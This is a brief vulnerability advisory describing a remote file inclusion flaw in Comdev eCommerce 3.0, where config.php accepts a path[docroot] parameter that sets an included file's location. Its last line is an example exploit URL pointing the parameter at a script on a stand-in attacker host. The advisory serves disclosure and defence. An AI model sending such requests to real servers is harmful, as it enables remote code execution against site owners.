Comdev eCommerce 3.0 is susceptible to a remote file inclusion flaw.
f2e1e1e0fccd12ce088028d4026ef864b42817e88ad3cc6b30ad701d52bd95d3
Class: Input Validation Error
Vulnerable: Comdev Comdev eCommerce 3.0
The config.php script can be passed a "path[docroot]" http request parameter to change the location of an included file.
Example:
http://www.vulnerable.com/oneadmin/config.php?path[docroot]=http://www.hacker.com/badscript.php.txt